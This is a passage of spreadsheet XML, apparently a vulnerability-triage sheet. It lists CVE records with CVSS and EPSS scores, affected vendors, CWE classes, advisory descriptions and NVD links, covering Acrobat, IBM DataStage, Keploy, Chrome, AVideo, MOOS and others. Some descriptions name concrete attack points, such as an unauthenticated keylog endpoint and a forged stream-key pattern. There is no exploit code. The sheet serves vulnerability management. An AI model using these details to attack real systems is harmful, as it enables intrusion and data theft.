          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="C1025" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1025" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1025" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82089</t>
        </is>
      </c>
      <c r="C1026" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="inlineStr"/>
      <c r="I1026" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1026" s="5" t="inlineStr">
        <is>
          <t>The wallabag (aka fr.gaulupeau.apps.InThePoche) application through 2.6.0 for Android allows XSS because /api/entries data is loaded into a WebView.</t>
        </is>
      </c>
      <c r="M1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82089</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82092</t>
        </is>
      </c>
      <c r="C1027" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="inlineStr"/>
      <c r="G1027" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1027" s="5" t="inlineStr"/>
      <c r="I1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L1027" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82092</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82095</t>
        </is>
      </c>
      <c r="C1028" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="inlineStr"/>
      <c r="G1028" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1028" s="5" t="inlineStr"/>
      <c r="I1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1028" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82095</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82097</t>
        </is>
      </c>
      <c r="C1029" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="inlineStr"/>
      <c r="G1029" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1029" s="5" t="inlineStr"/>
      <c r="I1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1029" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to a Server-Side Request Forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="M1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82097</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82098</t>
        </is>
      </c>
      <c r="C1030" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="inlineStr"/>
      <c r="G1030" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1030" s="5" t="inlineStr"/>
      <c r="I1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1030" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82098</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82099</t>
        </is>
      </c>
      <c r="C1031" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="inlineStr"/>
      <c r="G1031" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1031" s="5" t="inlineStr"/>
      <c r="I1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1031" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82099</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82641</t>
        </is>
      </c>
      <c r="C1032" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="inlineStr"/>
      <c r="I1032" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1032" s="5" t="inlineStr">
        <is>
          <t>Keploy versions 3.1.0 through 3.6.25, fixed in 3.6.26, bind the agent control-plane HTTP server to all interfaces without authentication, exposing endpoints that stream TLS session keys and traffic data. Attackers can access the /agent/pcap/keylog endpoint to retrieve NSS keylog lines and decrypt recorded TLS traffic, or invoke /agent/stop and /agent/storemocks to manipulate recording sessions.</t>
        </is>
      </c>
      <c r="M1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82641</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="C1033" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1033" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H10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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1033" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="C1034" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1034" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H103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34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1034" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83998</t>
        </is>
      </c>
      <c r="C1035" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="inlineStr"/>
      <c r="I1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1035" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84187</t>
        </is>
      </c>
      <c r="C1036" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="inlineStr"/>
      <c r="I1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1036" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a missing authentication vulnerability in plugin/Live/on_publish.php that allows unauthenticated attackers to mark arbitrary scheduled broadcasts as failed by sending crafted POST requests with schedule identifiers. Attackers can exploit the unguarded RTMP callback endpoint to modify scheduled broadcast status fields by supplying fabricated stream keys matching the pattern -ps-&lt;N&gt;, silently canceling any scheduled live broadcast without credentials or authorization.</t>
        </is>
      </c>
      <c r="M1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84187</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84889</t>
        </is>
      </c>
      <c r="C1037" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="inlineStr"/>
      <c r="G1037" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1037" s="5" t="inlineStr"/>
      <c r="I1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1037" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.3 could allow a remote authenticated attacker to execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84889</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85049</t>
        </is>
      </c>
      <c r="C1038" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>Use after free in Skia in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85049</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85051</t>
        </is>
      </c>
      <c r="C1039" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85051</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85053</t>
        </is>
      </c>
      <c r="C1040" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>Improper resource exposure in CacheStorage in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85053</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85094</t>
        </is>
      </c>
      <c r="C1041" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="inlineStr"/>
      <c r="I1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App  before 2.376.0 did not restrict the headers returned to an external origin running in a privileged WebView. A threat actor with control of the WebView could access a user’s session.</t>
        </is>
      </c>
      <c r="M1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85094</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85228</t>
        </is>
      </c>
      <c r="C1042" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="inlineStr"/>
      <c r="G1042" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1042" s="5" t="inlineStr"/>
      <c r="I1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the tensor buffer validation component in Amazon Deep Java Library (DJL) from 0.13.0 through 0.36.0 on all platforms might allow a remote unauthenticated actor to obtain information from adjacent process memory or cause a denial of service via a crafted tensor payload.
To remediate this issue, users should upgrade to version 0.37.0 or above.</t>
        </is>
      </c>
      <c r="M1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85228</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85430</t>
        </is>
      </c>
      <c r="C1043" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains an authentication bypass vulnerability in pShare that accepts UDP datagrams from any source and republishes them with the attacker-claimed identity intact. Attackers can send crafted UDP datagrams to pShare input routes to inject messages into the local MOOS community under spoofed identities, or send malformed datagrams to crash the pShare process.</t>
        </is>
      </c>
      <c r="M1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85430</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85432</t>
        </is>
      </c>
      <c r="C1044" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="inlineStr"/>
      <c r="I1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate client identity in MOOSDB message processing, allowing authenticated attackers to attribute writes to other clients by supplying arbitrary source identifiers in serialized messages. Attackers can forge message origins and cancel third-party subscriptions by exploiting the disconnect between authenticated connection identity and wire-supplied source attribution.</t>
        </is>
      </c>
      <c r="M1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85432</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85455</t>
        </is>
      </c>
      <c r="C1045" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a buffer over-read vulnerability in CMOOSCommPkt where a four-byte packet triggers out-of-bounds memory access during deserialization. Attackers can open a TCP connection to the MOOSDB port and send a crafted short packet to read memory before authentication.</t>
        </is>
      </c>
      <c r="M1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85455</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85677</t>
        </is>
      </c>
      <c r="C1046" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="inlineStr"/>
      <c r="G1046" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1046" s="5" t="inlineStr"/>
      <c r="I1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse News  WordPress plugin before 3.3.3 does not restrict the extra HTML it adds to WordPress's allowed elements to the context it is meant for, applying the same relaxed list to every sanitisation context including untrusted comments, allowing unauthenticated users to store JavaScript that will execute in the browser of any administrator who reviews the comment queue, and of any visitor to the post once the comment is approved.</t>
        </is>
      </c>
      <c r="M1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85677</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85684</t>
        </is>
      </c>
      <c r="C1047" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="inlineStr"/>
      <c r="I1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1047" s="5" t="inlineStr">
        <is>
